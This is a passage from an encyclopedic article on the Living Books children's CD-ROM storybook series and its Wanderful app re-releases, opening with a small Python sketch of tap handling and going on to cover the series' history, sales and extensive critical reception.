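        def tap(self, hotspot: Hotspot) -> None:
            """Handle a child's tap according to the configured mode."""
            if self.playing is not None:
                if self.mode == "patience":
                    # Patience mode: ignore input until the current action finishes.
                    self.log.append(f"ignored tap on {hotspot.name}")
                    return
                # Interruptible mode: cut the running action short so rapid taps
                # can replay a word's opening sound ("Baa-baa-baa-baby").
                self.log.append(f"interrupted {self.playing}")
            self.playing = hotspot.animation
            self.log.append(f"started {hotspot.animation}")

        def finish_current(self) -> None:
            """Called by the engine when the running animation completes."""
            self.playing = None

    # Example: three rapid taps on the word "baby" in each mode.
    word = Hotspot("word:baby", "say-baby")
    for mode in ("interruptible", "patience"):
        page = StorybookPage(mode=mode)
        for _ in range(3):
            page.tap(word)
        print(mode, page.log)

In this sketch the only behavioural difference between the two modes is whether a tap that arrives while something is playing interrupts it or is discarded, which mirrors the customisation option described above.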
Meanwhile, no changes were made to the user interface or appearance. The upgrade was made more complex by the addition of a page navigation and language selection system, as well as the need to synchronise the interruptible 2D animations with the audio and music. Additionally, the animations and sounds had to be interruptible and able to repeat rapidly if the user chose to interact frenetically with the system. All of this complexity and the many components that implement these capabilities were rolled up into the system's User Interactivity and Action Interpreter components. The team managed the display of ancillary assets in HTML/JavaScript, while the graphics and layout were done using CSS templates; this process added many months of effort to the schedule. This technology suited a "blended learning environment", combining "both face-to-face and distance learning". The titles were presented through a dynamic language function that allows readers to switch languages whenever they want. Titles came with two languages (either US English and Spanish, or UK English and French, which the user could toggle between), and offered in-app purchases for additional languages. Wanderful announced in 2012 that upcoming versions of the interactive storybooks would also be available in Japanese, German, Italian, U.K. English and Brazilian Portuguese. Touching the upper right and upper left blue triangles reveals pop-up page navigation thumbnails and pop-up language selection buttons, respectively. There was also an option to show where the hotspots are. The titles included interactive features for multi-touch devices and refreshed artwork for higher-resolution displays than were available at their original release. Players could buy the right to perpetual updates for $7.99. Deluxe versions of the titles were made available for teachers, with bonus features including the 30-page Teacher's Guide curriculum plans originally made for classrooms. Ray opted not to alter these much from the originals, which had been carefully constructed by a team of professionals, though the guides took account of the current US Common Core State Standards. These educator-focused Classroom Activities Guides were available for $2.99 as an in-app purchase, and tied each storybook to reading, arts, math, social studies and other subjects inspired by the narrative and adhering to the Common Core State Standards. They also included printable pages of puppets, activity sheets, and images from the stories. Additional content was added in-game; for example, Arthur's Teacher Trouble, a story focused on a third-grade spelling bee, was supplemented by three pages of interactive third-grade spelling words.
Reboot release and current era
Seven of the updated and enhanced storybooks were released on iOS throughout 2012, while Android and Mac OS versions were added from 2013. Wanderful's first four titles, released through 2012 at a price point of $4.99, were Arthur's Teacher Trouble (originally 1992), Little Monster at School (originally 1993), The Tortoise and the Hare (originally 1993), and Harry and the Haunted House (originally 1994). Harry and the Haunted House was released in October to coincide with Halloween. November 2012 saw The Berenstain Bears Get in a Fight released as the fifth title (originally 1995). The New Kid on the Block was released October 29, 2013 as the ninth. The Mac version was released on April 11, 2013.
Shlichting noted, "You're looking at a few dollars profit for an app instead of $30 for a CD game, and users expect more than they used to. To be a sustainable company, you have a higher bar for sales and quality." Living Books Samplers, standalone CD-ROMs which had been given away with the original Living Books for free in magazines or as built-in catalogs with the programs, were compiled and released as the Living Books Sampler free app with an interactive one-page sample of each title, and was updated as more storybook were re-released; Living Books Sampler was released on December 13, 2012 on iOS and April 25, 2013 for Mac OS X. The app is "hosted" by Simon, the narrator from Wanderful's classic version of the Aesop's fable Tortoise and the Hare. The app also includes Wanderful's Classroom Activities Overview and a Classroom Activities Preview for one of the storybooks, both as PDF documents. Living Books Sampler contained over 250 interactive elements. Little Ark Interactive became a wholly owned subsidiary of Wanderful. Two titles from the affiliate were re-released in March 2014. The third, Noah's Ark, was released in 2016. They aimed to continue releasing titles under this banner " to help children discover a lasting love of language through story exploration and learn important lessons from the Bible." At the ISTE (International Society for Technology & Education) 2014 conference, Software MacKiev and Wanderful Interactive Storybooks announced the availability of Stellaluna for iPad/iPhone/iPod Touch and Mac OSX computers. Software MacKiev would release the iOS versions of four storybooks: Dr Seuss' ABC, Green Eggs and Ham, Stellaluna, and The Cat in the Hat, though Wanderful's Dr. Seuss titles would be removed from the App Store to prevent confusion over the similarly titled Oceanhouse Media apps. Oceanhouse Media would become the largest interactive books publisher on Amazon Fire TV by 2018, and had 62 titles including versions of the same titles that Living Books had adapted. In March 2016, Schon donated to The Strong museum hundreds of materials that document the Living Books' history, including games and company records from between 1993 and 2000. Wanderful currently has 9 employees and has generated $1 million in sales. In 2020, Wanderful announced that their Classroom Activities Guides would be offered for free with their storybook apps to assist families during COVID-19 isolation. To date, the first Living Books title Just Grandma and Me has sold over 4 million copies in seven languages, while Harry and the Haunted House has sold over 300,000 copies in six languages. The Living Books series as a whole went on to sell tens of millions of copies in multiple languages. Living Books titles are currently available through Wanderful Interactive Storybooks' series of app re-releases on iOS. The Living Books rights are currently licensed from Houghton Mifflin Harcourt. Legacy Contemporary opinions In August 1992, Kiplinger's Personal Finance wrote of the series, "there's not much demand for computer CD's yet, but I like that fact that Broderbund looks ahead". That month, Computer Gaming World wrote, the "notion of matching children's books to CD technology is nothing short of inspired" though noted the disk-access and data transfer limitations of CD-ROMs; nevertheless the magazine anticipated the series would "probably go down in history as the Carmen Sandiego of the talking book genre". 
Upon release, Wired wrote that Just Grandma and Me was the "closest thing to an 'instant classic' in the relatively new arena of children's CD-ROMs". Critics raved about it. Newsweek suggested that Schlichting could "end up serving as the Dr. Seuss of the digital age", as he had an "ear — and respect — for the tastes of kids". According to Publishers Weekly, the Living Books company was formed in 1994 "amid a great deal of fanfare". For Michael J. Himowitz at Tampa Bay Times, the series brought back the "old 'Gee whiz' reaction" that he had lost over his decade spent playing and reviewing computer games. Compute! asserted in 1993 that the introduction of the Living Books series saw Broderbund "adding yet more extraordinary titles to an already superior product line". The New York Times felt the "post-modern" series "turns traditional beginning-to-end narrative on its head". Compute! wrote that users would be "enthralled by this new style of storytelling". Newsweek thought that Living Books demonstrated Broderbund was "one of the first companies to experiment with CD-ROMs". The Age felt the series "gave children's stories a whole new life", and "caused both teachers and parents to reflect on the value of such a format for books"; it felt that the series' continued output and sales were testament to the view that the majority of customers believed it had something to offer young readers. Compute! wrote that Living Books "demonstrates the power of multimedia computing" through this "perfect babysitter", and ultimately praised Broderbund's "virtuoso performance" in "taking the lead in advancing the state of the art of educational multimedia software". Newsweek dubbed Schlichting the "reigning muse in the business of converting children's lit into interactive CD-ROM discs [that] kids squeal over". At Disney, Living Books were considered "exemplars of how best to create engaging, enriching, digital story experiences for children". The Washington Post deemed it "the best of the book-bound-read-along genre". Just Grandma and Me, the first in the series, was deemed by The New York Times the "standard-bearer of the Living Books line", which it described as a "kind of multimedia industry gold standard". Compute! wrote, "These Living Books delight at so many levels they'll make you want to buy a CD-ROM player if you don't already have one for your home computer". Computer Gaming World wrote that Living Books' quality is "unmatched" and comes with the highest recommendation, and felt the "acclaimed series" should be "at the very top of any parent's list". In 1995, the St. Louis Post-Dispatch wrote, "almost any kid with a home computer and a CD-ROM has heard of Living Books". Anne L. Tucker of CD-ROM Today revealed "I'm addicted to Living Books", and wished all her favourite childhood stories could be adapted by the series. PC Magazine wrote that Arthur's Teacher Trouble as well as Just Grandma and Me are "among the best-ever CD-ROMs". Emergency Librarian wrote the series upheld the high standards of Broderbund. TES thought the series owned the interactive storybook genre. In 1996, The Educational Technology Handbook wrote that Living Books was "running away with awards". Inside Education thought the series was "setting a standard for excellence in the children's software industry". By 1997 there were at least eight manufacturers of CD-ROM interactive storybooks. Salon described Living Books as "one of the hot companies of the early-'90s electronic publishing boom".
The Seattle Times asserted that Living Books "popularized the animated storybook format". Strategy+Business deemed the series part of Broderbund's "string of winners", including Print Shop, Where in the World Is Carmen Sandiego?, Kid Pix and Myst. In 1999, Interaktive Geschichten für Kinder und Jugendliche auf CD-ROM noted Broderbund was "one of the first companies to convert books into multimedia form". Schlichting's child-informed design is a technique that by 1999 would become ubiquitous in both the industry and academia, almost a decade after its use by Living Books. Living Books were the first to use both "read to me" and "let me play" modes, as well as speech-driven highlighting; both techniques have since been widely adopted in children's language app design. Children's Tech Review featured an interview with Schlichting in its March/April 1999 issue entitled A Conversation with Mark Schlichting: The Guy Who Thought Up the Living Books; in it the publication opined, "if someone asked you to name the best children's software ever made, Living Books would surely make the list". Massenmedium Computer reflected in 1999 that the 'virtual pop-ups' received "surprisingly good" reviews despite Living Books' short history and the series' "artistically unappealing design".
Modern opinions
Living Books pre-empted the popularity of the industry; by 1995 the CD-ROM market had "exploded". The Museum of Play wrote that Living Books was the "leader in this effort to upgrade juvenile literature for the digital age". Interactive stories for children and teenagers on CD-ROM agreed it was "one of the first companies to translate books into multimedia". Gamasutra designated it "the oldest CD ROM series for kids". Living Books became popular and encouraged other developers to follow suit and copy the formula. While teachers had already been buying copies of the games for their classrooms for years, the series would become one of the first pieces of software to be accredited as a 'textbook' in several states. However, when the program was first released in schools it had a "very mixed reception"; Multiple Perspectives on Difficulties in Learning Literacy and Numeracy noted that teachers observed children crowding around the screen to play and screaming with laughter when triggering animations, and that children agreed they were not paying attention to the text. The series won many awards and its creators received letters from children and parents. People became so enamoured of Living Books that the book authors were asked to autograph the CD-ROMs. Apple Inc.'s John Sculley even used the titles in product demonstrations. The series was seen as the "multimedia de facto standard" by Microsoft, and was shown nationally and internationally by Bill Gates. The Huffington Post deemed the series the first example of ebooks, and the precursor to the eReader-tablet pairing that popularised digital reading. Children's Tech Review agreed that Living Books pre-empted ebooks by 15 years, deeming them "children's e-books". Living Books has frequently been used in research papers regarding child learning. In the years after the sale of Broderbund, Schlichting struggled to reach the levels of fame of his series, as his name didn't appear on the products themselves.
However, in 2012, Schlichting was awarded the Kids at Play Interactive "KAPi" Award for 'Legend Pioneer' at the Consumer Electronics Show for "inspiring a generation of younger designers" through Living Books and Noodle Words; the jurors commented, "it's about time this guy is recognized for his contribution to the field." Hyper Nexus noted that Living Books' reputation for ease and functionality led consumers to test other Broderbund programs and the company to achieve strong market domination, a phenomenon it had earlier observed with 1984's The Print Shop. In 2007, a presentation at the 12th Human-Computer Interaction International Conference asserted that there is a "cult that involves millions of 'Living Books Freaks', who use the titles for hours every day, both in groups and alone". French site Week-ends.be asserted that Living Books were "master choices" that are "unanimously appreciated by children". Jon-Paul C. Dyson, director of The Strong's International Center for the History of Electronic Games, said "Living Books was an innovator in the creation of interactive books and became a leader in the development of educational and entertaining software for young children". In his paper Multimedia Story-telling, Yoram Eshet deemed Living Books "one of the most powerful and widespread expressions of multimedia educational environments", and asserted that interactive storybooks are "one of the most common edutainment genres". According to Computer Gaming World, the Wanderful project addresses the "challenge of overcoming so-called software rot", in which computer programs become incompatible with modern hardware as contemporary systems are discontinued and upgraded. Igotoffer wrote the series "perfected the art of creating kids' storybooks on CD-ROM". Storybench described Schlichting as one of the forefathers of edutainment due to his work on Living Books. Dust Or Magic, Creative Work in the Digital Age thought Living Books was the sole exception in the CD-ROM publishing 'shovel-ware era'. Dust or Magic, a digital design-sharing platform inspired by the book and produced by Children's Technology Review, asserts that the early success of Club Penguin, Pokemon, Minecraft or Living Books "can be tied in part to their clever use of animation and humor, which aren't used randomly or without purpose"; it writes that Living Books "went on to become a standard-bearer of quality, loved by children, parents and teachers alike for their emphasis on good stories and entertaining exploration". Teachers With Apps wrote that the series was considered by "many in the industry to be the benchmark for engaging educational multimedia".
Creator opinions
Schlichting acknowledges that Living Books became a household name, but "only after a struggle". According to him, Living Books became the industry's first truly interactive storybooks and "defined the category". Schlichting asserts that the series' lack of an install step and its automatic play feature were revolutionary for the time. He noted that the "attract mode" was so popular that parents would write in to say that their kids had learnt all the moves and would dance along. Schlichting later learnt that his direct address technique was one of the methodologies of Montessori education, though he had added it because "it seemed right". Schlichting discovered that children with autism or with special needs felt that their decisions "'made' the animation happen", and that they were able to map this feeling of control onto the real world.
Schlichting's ex-coworker Jesse Scholl opined that he "knew so much about how children think and what they cared about". Mickey W. Mantle, president and CEO of Wanderful, reflected that "Living Books has such an amazing legacy, remembered by children, trusted by parents and embraced by the educational community" through "elegant, interactive-rich...production values". Over the years, Schlichting has had many people tell him that they learned English from Living Books. George Consagra, executive producer of Ruff's Bone, thought Living Books were "pioneers in the art of interactive storytelling". Prior to his work on Ruff's Bone, Noyes had been inspired by Just Grandma and Me, subsequently seeing CD-ROMs as the "perfect modern-day medium" for his children's projects. Angie Simas, who ran Broderbund's first website, came to the company for an interim job while seeking a teaching position, though after observing Living Books two weeks in, she was inspired to change her career to the computing industry. Axworthy recalled that his daughter, unaware of his software career, one day gushed about a product she used at school, Sheila Rae, the Brave (about two sisters who learn to love and depend on each other), not knowing her father had worked on it. He recalled Schlichting as being difficult to work with, but appreciated the impact he had on children's lives. Mantle noted that Living Books were "pioneering apps on Macs of a generation ago" and that over the years they had "had many requests from Mac-using teachers and parents" to revive the programs, so he was "excited to make these great story experiences again available for the Mac". He said the project came "full circle". In 2014, he noted "Wanderful Apps have long been favorites of special needs children in the autistic community."
Relationship to other series
Broderbund's Living Books series was perhaps the first example of popular children's stories in print being adapted into digital storybooks that encouraged interactive learning and play on the computer, or at least popularized the animated storybook format, through hits such as Just Grandma and Me and Arthur's Teacher Trouble, which were based on popular children's books from the 1980s by Mercer Mayer and Marc Brown respectively. The Seattle Times asserted that Living Books encouraged other developers to follow suit. Disney copied the formula through Disney's Animated Storybook, whose interactive screens imitated Living Books' interactive pages. Both companies combined the authors' illustrations and stories with digital activities and were guided by a narrator: each screen began with a brief animation followed by a narrator describing the action; after the conclusion of each page, the scene became an "interactive mural with hot buttons" the player could click. Project LITT: Literacy Instruction Through Technology found that Living Books had high text interactivity and minimal extraneous games and activities, while Disney's Animated Storybook had medium text interactivity and embedded games and activities. New Media noted that "nothing sells like a character" that has already been proven in media, a strategy Disney used by creating spin-offs of its film and TV projects, and which Living Books applied to a lesser extent with popular books. Compute! suggested that the only negative to the series was its "hardware expectations", though noted it would "encourage people to upgrade their machines".
Computer Shopper negatively compared activities in Living Books titles to those in Disney's Animated Storybook. Meanwhile, the Los Angeles Times criticized Disney for contracting its games to independent studios like Media Station, deeming the series "a mere imitation of Broderbund's Living Books format". The study Talking Storybook Programs for Students with Learning Disabilities found that "Living Books programs appeared more comprehensible to students than the Disney programs". MacUser felt Slater & Charlie Go Camping by Sierra On-Line was a "pale imitation" of the Living Books series, while PC Mag thought it wasn't "quite as richly animated" as Living Books. Additionally, MacUser wrote that series like Living Books and Discis' Kids Can Read "operate on two levels" by letting players follow the story narrative and by exploring the story's contents. Meanwhile, the De-Jean, Miller and Olson (1995) study found that children preferred Living Books over Discis as the latter "could not be played with". The Seattle Times compared Living Books' hunt for surprises with Electronic Arts' Fatty Bear's Birthday Surprise and Putt-Putt Goes to the Moon. Bloomberg positively compared the series to interactive storybooks from Packard Bell Electronics subsidiary Active Imagination, deeming the latter "not quite as rich". Children's Technology Review thought TabTale's 2011 app The Ugly Duckling imitated the Living Books style. Complex asserts that Reading Blaster and Science Blaster never received the same amount of attention as Math Blaster! due to "failing to live up to competition from the likes of the Living Books series", and wrote that Living Books could "hold a candle" as a Carmen Sandiego contemporary. Game Developer Magazine grouped Living Books and Big Tuna Productions titles together into The Living Book Series, though noted the latter was a pale imitation of the former.
Critical reception
As a learning tool
Many reviewers praised the series as a learning tool. Multiple Perspectives on Difficulties in Learning Literacy and Numeracy felt the series offers children a narrative context to explore while giving them authority and control over the interface to motivate them to learn. The New York Times described it as "a reading lesson dressed up as an interactive cartoon". Compute! felt that the interaction led players to a "cartoon fantasy...wonderful, witty world of zaniness" that was both fun and educational. Children's Interactions And Learning Outcomes With Interactive Talking Books deemed the series "very much 'edutainment'". Folha appreciated that the games did not present the player with puzzles to solve. Multiple Perspectives on Difficulties in Learning Literacy and Numeracy asserts that the software had been "cleverly crafted" so that play could not commence until after the page had been read with each word highlighted, offering a narrative context for the children. The Educational Technology Handbook praised the series' 'whole language' approach. According to Technology & Learning, Living Books has the "ever-present message that reading is joyful, important and empowering". Tampa Bay Times wrote that they "respect their audience's intelligence". The Baltimore Sun felt the series was "educational and entertaining". The Guardian felt the series was "well suited for Years 1 and 2, and provide stories with patterned and predictable structures."
The Children's Trust wrote that the series improves short-term memory, attention and organisational skills, independence and accuracy, language development, decision-making and problem-solving, and visual scanning. The Exceptional Parent recommended the series for parents wanting to "develop [their] child's interest in words and reading". Village Reading Center's Susan Rapp said Arthur's Reading Race was an "enjoyable first learning tool". PC Mag highlighted that the series was known for the messages the titles teach children, be it "the rewards of sharing" or "learn[ing] to separate fantasy from fact". According to Multiple Perspectives on Difficulties in Learning Literacy and Numeracy, the programs were "designed by cognitive scientists who knew about the psychology of both learning and play". The Age felt that the activities presented in the Framework kit were "quite structured" and "would be welcomed by teachers just starting out". Dan Keating of the Logansport Pharos-Tribune wrote the series was "interactive, entertaining and educational" and that the product line "pleased [him] every time". ACTTive Technology suggests, "a child teaches himself to read a book like Just Grandma and Me independently and with the help ONLY of the computer". The series has been highlighted for its incidental learning. One 2004 study, in which Grade 1 and 2 Spanish- and Hebrew-speaking immigrant children played the English version for two months, found that they recognised and pronounced 70% of the story's words, suggesting that the game offered a "massive and effort-free 'incidental learning'" experience. The children reached a high level of proficiency in understanding and pronouncing English words just by intensely playing Living Books, despite not coming from English-speaking backgrounds and being illiterate in English. Another study found that the engaging and motivating design of Living Books' creative construction approach achieved effective incidental, unexpected, and by-product learning. The Philadelphia Inquirer reported that children with autism who had never spoken a word imitated the phrase "I'm sorry" from the series after playing, noting that the series assisted children with neurological problems to process and retrieve information. Other critics questioned the series' efficacy as a learning tool. The Age notes that the idea of presenting a book with interactivity, sound, and music was a "whole new idea" that "left many unsure as to its soundness"; reactions from teachers were mixed, with some believing it added "another dimension to literature", while others felt it would have been "cheaper and more worthwhile" to buy the class physical copies of each book. While Simson L. Garfinkel and Beth Rosenberg of Boston Globe Online found Living Books to be of high quality in a market flooded with "questionable" releases for children, they stated that not all of the titles lived up to the company's educational claims, noting Dr. Seuss' ABC and Arthur's Reading Race as exceptions. In a 1995 study, Preparation of Teachers for Computer and Multimedia-Based Instruction in Literacy, "students were consistently impressed with the entertainment value of such software, but extremely dubious about their classroom usefulness". A study presented to the American Educational Research Association in 1996 showed that "jazzy 'interactive storybooks' like Harry and the Haunted House...promote less reading comprehension in kids than moderately interactive, more fact-oriented CD-ROMs like Discis Books' Thomas' Snowsuit".
SuperKids suggested that while the programs wouldn't teach kids to read, they may "enhance a pre-reading child's interest in, and appreciation for books". The Independent described it as "quasi-educational material" due to being "designed to inject fun into learning". The New York Times wrote that the educational content seemed like an afterthought, adding that they were "horrified" that the Arthur's Computer Adventure activity 'Deep Dark Sea', instead of teaching children world geography or ocean life, was a "pure entertainment" game. The Washington Post wondered if children would learn to read or just play with the illustrations. The Goldstein, Olivares and Valmont (1996) study found that children had trouble recalling the narrative as they "approached the reading as a game, rather than a text". Complex questioned whether the series "took away a bit of the imagination inherent to reading", though noted they were "undeniably fun". The Age wrote, "I'm sure they entertain more than educate, but either way they create a new dimension to children's literature".
Hotspots and interactivity
The series has been praised for its use of hotspots and interactivity. The Age noted that upon the series' original release, "some people saw it simply as a form of interactive cartoon, while others have described the Living Books series as little more than a talking book". Compute! thought that in "typical Broderbund fashion", Living Books "goes way beyond a simple storytelling program". CD-ROMs Rated by Les Kranz praised the number of clickable areas in Little Monster at School. The Independent liked the "hidden cartoons in every page". Compute! wrote Living Books is "overflowing with one enchanting discovery after another". Folha appreciated that the series encouraged players to discover by moving around the screen, giving movement and speech to objects. The New York Times praised Just Grandma and Me for its interactive "distractions" alongside the story text and illustrations. Technology & Learning opined, "the developers seem to have delighted in creating imaginative events". The Seattle Times said Just Grandma and Me was "full of discovery". SuperKids felt The Tortoise and the Hare had a "captivating variety of exploration opportunities for young minds". Wired thought the peripheral elements were "cleverly" designed to be "playful", "imaginative", and "sometimes humorous". Children's Tech Review wrote that the series combined full color animation with a "crisp, responsive design" that "stood out from the rest". Tampa Bay Times reported their child testers willingly forwent Beavis and Butt-Head and WWF Wrestling to play the program, arguing the series' secret ingredient was "creativity". Entertainment Weekly praised Arthur's Birthday for its "inventive ending" and "hilarious hidden secrets". PC Mag called the series "charming", "delightful", "engaging", and "entertaining". Parent's Choice wrote "the thought and creativity that was put into the interactivity in Berenstain Bears Get in a Fight is largely unmatched in any other interactive book." The Seattle Times wrote that the games' simplicity is a draw, as they lack "whizzy technology or tortured attempts to be interactive". The Educational Technology Handbook liked that the series "permit[s] user control over pace, sequencing, and help". Family PC noted their success was due to "let[ting] kids explore and find a cause-and-effect relationship between clicking the mouse and having something happen on the screen."
All Game deemed Berenstain Bears in the Dark a "useful addition to any child's library of computer games". Game Developer Magazine felt the series "flunks out" in versatility, as players are unable to "abort an animation" despite some of them being quite long. Jim Shatz-Akin at MacUser suggested, "they're not as interactive as they could be...The Berenstain Bears Get in a Fight has long animations during which all a kid can do is sit and watch". Graphics and animation; music and sound The series has been praised for its graphics and animation. CD-ROMs Rated by Les Kranz praised the graphics of Little Monster at School. Compute! deemed Living Books a "new style of storytelling that is just a hop away from a fully interactive cartoon"; the magazine praised the animation sequences as "topnotch" and "approach[ing] cartoon quality, as well as the character-adding facial expressions". Tampa Bay Times noted the animations have the quality of Saturday morning cartoons. Meanwhile, The New York Times Guide to the Best Children's Videos thought the characters in Arthur's Computer Adventure were "stiff" compared to those in the TV show. Sally Fennema-Jansen's paper "Essential Tools of the Trade" notes that programs like Living Books and the Early Learning House offer a variety of visual effects, which are essential in engaging students at the computer. CD-ROMs Rated wrote that children would be disappointed by other interactive storybooks like Mud Puddle and The Paper Bag Princess due to them lacking Living Books' animated illustrations. PC Mag felt the games were "PC's answer to the tradition of big screen animated films". New Straits Times thought the graphics were "colourful and sharp" despite being on a 256 color display. The Baltimore Sun thought the series had "delightful animation" with "zany surprises". The Washington Post described the programs as the "electronic equivalent of pop-up books"; it felt the "animations are whimsical enough to amuse parents". Children's Tech Review wrote that they featured "state-of-the art graphics and sound". Tampa Bay Times described Living Books as "[like] a cartoon episode of Masterpiece Theatre". Computer Shopper's Carol S. Holzberg said Sheila Rae was a "wonderfully upbeat and toe-tapping reading adventure". The series has also been praised for its music and sound. The New York Times praised Just Grandma and Me for offering a "captivating" soundtrack. Fennema-Jansen's paper likewise notes that such programs offer a variety of auditory effects, which are essential in engaging students at the computer. An information sheet published by the British Educational Communications and Technology Agency said the series "work[ed] well with children who are unresponsive and who avoid conversation, as they become involved with the combination of sound effects, spoken text and visual display". The paper 'Multimedia materials for language and literacy learning' suggested that the "animation and special effects may improve the quality of the story model by providing multi-sensory cues to children with language and literacy disorders who might otherwise ignore important contextual information". SuperKids felt The Tortoise and the Hare had a "clear presentation". SuperKids thought Stellaluna was a "beautifully done version". Compute! thought New Kid on the Block "adds a new dimension" to Living Books. Adaptation of books The series has been praised for its adaptation of books. 
Tampa Bay Times felt that The Tortoise and the Hare "demonstrates that even a timeworn tale can be revived for youthful audiences with multimedia dazzle". Courant felt that the success of its games was aided by the "opportunities for animation and fun" within their source material. Publishers Weekly, in a review of Dr. Seuss' ABC, stated that "the producers' fondness for Dr. Seuss and their fidelity to his sense of refined silliness spill into every sequence." On the other hand, reviewing two Dr. Seuss titles, The Washington Post criticised Living Books for "re-purposing content" and "exploiting existing media franchises", adding that "nearly all of the additions mangle or simply ignore the Seuss sensibility". PC Mag felt Living Books' Arthur's Birthday "captured all the charm of the original". The Photographic Image in Digital Culture thought Living Books was a "successful reworking of children's literature". Business Standard felt Green Eggs and Ham was "faithful to the original" while MacWorld felt it offered a "charming, lighthearted adaptation". The Educational Technology Handbook praised the series' use of quality literature. MetzoMagic thought Green Eggs and Ham would be "irresistible for Dr Seuss devotees". SuperKids felt Green Eggs and Ham was a "very good program, based on an excellent story". Allgame felt Arthur's Reading Race was "sure to delight children who enjoy the adventures of Arthur in books or on TV". Macworld suggested that Arthur's Reading Race's success was "a testament to Arthur's entertainment value". Complex felt the games allowed kids to "live out their personal Pagemaster fantasies". SuperKids thought Tortoise and the Hare "does the old story justice". Baltimore Sun liked that Living Books chose to adapt a "well-written story with a moral". The Seattle Times noted the series' short playtime, though it also noted its replay value, as children like to revisit favourite books. SuperKids also noted the series' replayability, as their kid reviewers engaged with the story even if they had read it before. Conversely, The Daily Gazette warned that Arthur's Computer Adventure wouldn't hold kids' attention for long. Mac Observer described the series as "cognitive dissonance free" as opposed to other interactive storybooks where the "action either contradicts the story or adds nothing to the narrative being employed". On the other hand, Len Unsworth's paper "Reframing research and literacy pedagogy relating to CD narratives" noted the dissonance between text and action; in Stellaluna, "They perched in silence for a long time" is followed by incongruous activity and noise instead of a reflective pause; Unsworth writes that the actions are "gratuitous intrusions into the story and which do not appear in the book version in any form". Simson L. Garfinkel and Beth Rosenberg felt that the added dialogue supplementing the book's text was sometimes "out of character". Of The Tortoise and the Hare, Creighton University said, "By comparison with the exciting interactive program, the book is only okay". Many critics wrote about the series as a reading tool compared to the physical book. The New York Times questioned the bundling of the "original "dead" book" with the CD-ROM adaptation, suggesting "most children never get around to opening the real book". Hartford Courant opined "[it] just isn't as good as sitting on the sofa with your child on your lap and a stack of books next to you". 
Salon suggested the series had a portability problem when compared to traditional books, and that they didn't work as "sleeper-friendly software". Donald R. Roberts, chairman of Stanford University's Department of Communication, felt there were important "social dimensions" involved in the parent-child reading process that couldn't be replicated through a digital book, including contact and a sense of security. World Village felt Living Books "handsomely realized the story" of The Berenstain Bears: In the Dark. German site Rhein-zeitung.de felt the "combination of CD and book has the best conditions to become a bestseller". PC Mag noted that the series offers a narrator that can read the same page over again "without complaint". Humour, writing, and ease of use Many critics praised the series' humour and wit. The Independent thought the best titles were "amusing" with funny storylines. Compute! deemed Ruff's Bone "the funniest Living Book so far". The Children's Trust lamented that Living Books wasn't aimed at an older audience, but wrote that the storybooks were sufficient for their patients due to being "amusing". PC Mag thought Living Books "pack enough humor and tickle adults as they entertain children". Compute! conceded that even adults would be "affected by its delightful story and sharp sense of wit." Len Unsworth's paper "Reframing research and literacy pedagogy relating to CD narratives" writes that Stellaluna departed very significantly from the "somewhat serious tone" of the book, taking an almost slapstick approach to frivolous humour. Baltimore Sun felt the activities were the "right blend of humor and purpose". MacWorld deemed Arthur's Reading Games an "amusing, interactive product". Courant felt that the developer had "the formula figured out". Upon previewing the second title in the series, Computer Gaming World wrote that Just Grandma and Me was "not just a creative fluke", and felt Living Books "may have the wit and imagination to keep the magic in the series indefinitely". Tes.com thought of Just Grandma and Me, "There's so much charm that parents, and teachers, will enjoy it too." World Village thought Arthur's Reading Race was "very well written". The Baltimore Sun felt the games "vary dramatically in quality" while The Independent agreed that the books' quality fluctuates. SuperKids felt Arthur's Computer Adventure was "not the strongest entry in the Living Books product line". Many reviewers praised the series for its ease of use. Compute! noted "it's a cinch for even very young children to run the program without adult assistance". The Spokesman Review described the series as "Broderbund's software version of training wheels." Simson L. Garfinkel and Beth Rosenberg found that the CD-ROMs played better on Macs than on PCs. New Straits Times felt their "simple and interactive interface" gave Living Books an "edge" over its competitors. Engadget deemed it "the young-kid equivalent of Cyan's revolutionary Myst immersive world". Tampa Bay Times felt the titles were "crash-proof" with "rock-solid reliability and kid-friendly ease of use", adding that the series succeeds in "encouraging children to become comfortable using a computer". All Game noted that no documentation is provided but that "everything is self-explanatory and intuitive within the program". 
The Age suggested that the games would only become popular in Australian schools once schools had regular access to CD-ROM units. Race and gender, and in translation MacUser felt that Living Books and Edmark's Early Learning House overcame the issue of exclusively Caucasian characters in younger children's programs through the use of animal and friendly monster protagonists. The New York Times Guide to the Best Children's Videos felt the use of a female role model in Sheila Rae, The Brave was "excellent". Allgame thought Sheila Rae was an "excellent program for young girls and boys". One study of The Tortoise and the Hare found that some of its incidental hot spots included stereotypical depictions of male and female behaviours. MacAddict criticised the Little Ark Interactive title Daniel in the Lions’ Den for teaching stereotypes; the titular protagonist Daniel is thrown into the lions’ den by three "not-so-wise" men who are characterised as fat, hunchbacked, and darker-skinned respectively, together acting like the Three Stooges. In 1994, Aktueller Software Markt praised two entries in the series and concluded its review by begging for a German translation of the programs. After a local version was launched in 1998–9, German site Feibel noted that "the translation was done by people who have no idea about the German language", adding that "particularly disturbing is the voice of the grandmother, who has an American accent"; the site argued that "the accent alienates the text" and "significantly reduced the quality of the story". Of the international dubs, reviewer Roger Frost commented, "It's interesting that several teams of experts worked on these, just to 'dub' them so that lip movements matched the new dialogue". The Age wrote that the "ongoing popularity of adventure games", including the Carmen Sandiego series, Flowers of Crystal and Dragonworld, showed promise that Living Books would "become very popular in Australian classrooms". Re-releases and Little Ark Interactive The Seattle Times felt the additions in the Version 2.0 re-releases wouldn't be enough to convince customers to re-purchase the program. Of the Wanderful re-releases, Engadget questioned whether the storybooks would hold up in the current market, though it noted the "effort and care that went into their original versions". Children's Technology Review wrote of Wanderful's Ruff's Bone app, "[it's] a good book meets solid interactive design, in this updated iPad edition of the classic Living Book". CNBC deemed the dynamic language function in the Wanderful re-releases a "stunningly simple and powerful feature unlike anything found in other interactive storybooks or eBooks". Mac Observer felt the Wanderful upgrade had "well researched curricula and activities aligned with the Common Core State Standards Initiative". Children's Tech Review noted that on the iPad screen the graphics look "bitmapped" and "fuzzy", as if they have been "directly ported", though added that this gives the programs a "retro" look; they praised the hotspots as "still-funny-after-all-these-years" and the sound as having not "faded a bit". The site praised the modern multi-touch environment that "enhance[s] a child's feeling of control". They noted that while Living Books still had its "magic", "unlike the '90s, [children] have many more choices". 
